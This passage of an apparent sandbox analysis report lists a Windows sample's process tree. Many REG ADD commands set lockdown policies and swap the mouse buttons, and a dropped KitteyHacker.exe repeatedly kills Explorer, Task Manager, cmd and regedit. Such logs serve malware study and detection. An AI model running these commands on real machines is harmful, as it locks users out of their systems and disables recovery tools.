- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_MenuFavorites /t REG_DWORD /d 0 /F
    3⤵
    PID:308
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowHelp /t REG_DWORD /d 0 /F
    3⤵
    PID:2984
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowNetPlaces /t REG_DWORD /d 0 /F
    3⤵
    PID:2896
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowHomegroup /t REG_DWORD /d 0 /F
    3⤵
    PID:2892
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_SearchPrograms /t REG_DWORD /d 0 /F
    3⤵
    PID:2340
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 1 /F
    3⤵
    PID:2864
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 1 /F
    3⤵
    PID:2860
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /F
    3⤵
    PID:2808
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /F
    3⤵
    PID:2736
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /F
    3⤵
    PID:2948
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuLogoff /t REG_DWORD /d 1 /F
    3⤵
    PID:2852
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /F
    3⤵
    PID:2692
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /F
    3⤵
    PID:2716
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /F
    3⤵
    PID:1064
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /F
    3⤵
    PID:2100
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /F
    3⤵
    PID:3044
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /F
    3⤵
    PID:2020
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /F
    3⤵
    PID:2656
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /F
    3⤵
    PID:2684
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /F
    3⤵
    PID:2284
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /F
    3⤵
    PID:268
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /F
    3⤵
    PID:1188
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /F
    3⤵
    PID:2272
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /F
    3⤵
    PID:756
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMMyDocs /t REG_DWORD /d 1 /F
    3⤵
    PID:2720
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /F
    3⤵
    PID:1296
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /F
    3⤵
    PID:292
- - C:\Users\Admin\AppData\Local\Temp\C9B5.tmp\KitteyHacker.exe
    KitteyHacker.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: GetForegroundWindowSpam
    PID:2940
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2388
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1932
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2320
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2572
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1688
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2728
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:1564
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:940
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2040
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1880
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1328
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2792
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2424
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1980
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1284
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2452
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2324
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2260
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2268
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2136
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2336
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1656
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:876
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2160
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2208
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2296
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:1580
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1684
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2840
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2968
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2140
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2796
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2696
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2864
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2372
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2948
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:3032
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3044
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2272
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1572
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1208
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2016
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:3012
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2156
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1488
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:892
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:1788
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1908
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2764
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2192
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1844
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2768
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2388
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2384
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2788
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2320
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:992
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2604
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1680
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1564
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1924
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1384
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2592
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1804
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:956
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2976
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:1528
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:548
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1660
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2324
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1300
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2268
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:664
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2336
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1740
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:876
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2376
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2292
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2500
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2612
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2920
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2832
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2984
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2096
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2140
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2824
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2716
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2708
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2656
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2980
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2356
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3068
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2196
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2784
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:668
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1188
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2184
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1340
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1324
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1704
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1696
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2156
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1520
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1488
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2032
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1388
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:3052
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1836
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1644
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:1932
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1844
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2384
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1512
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2788
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2560
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:2640
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2076
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:1268
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:940
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:3008
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1880
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:1804
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:760
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:956
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1980
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        
        PID:2008
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:1884
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Kills process with taskkill
        
        PID:2752
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1660
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:272
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2532
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2468
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2580
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:1988
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1740
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:2836
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2376
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:2972
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2568
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        
        PID:2904
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:2920
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2816
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2340
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2736
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:2824
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        
        PID:2684
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2688
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        
        PID:1604
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:2656
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:2660
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1968
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        Kills process with taskkill
        
        PID:2616
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:2608
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:2512
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
      PID:1188
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        
        PID:756
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM regedit.exe"
      4⤵
      PID:2184
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        5⤵
        Kills process with taskkill
        
        PID:2652
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM explorer.exe"
      4⤵
      PID:1976
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:1480
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
      4⤵
      PID:1696
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        5⤵
        
        PID:2812
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "shutdown.exe -a"
      4⤵
      PID:1000
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        5⤵
        
        PID:1908
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "TASKKILL /F /IM cmd.exe"
      4⤵
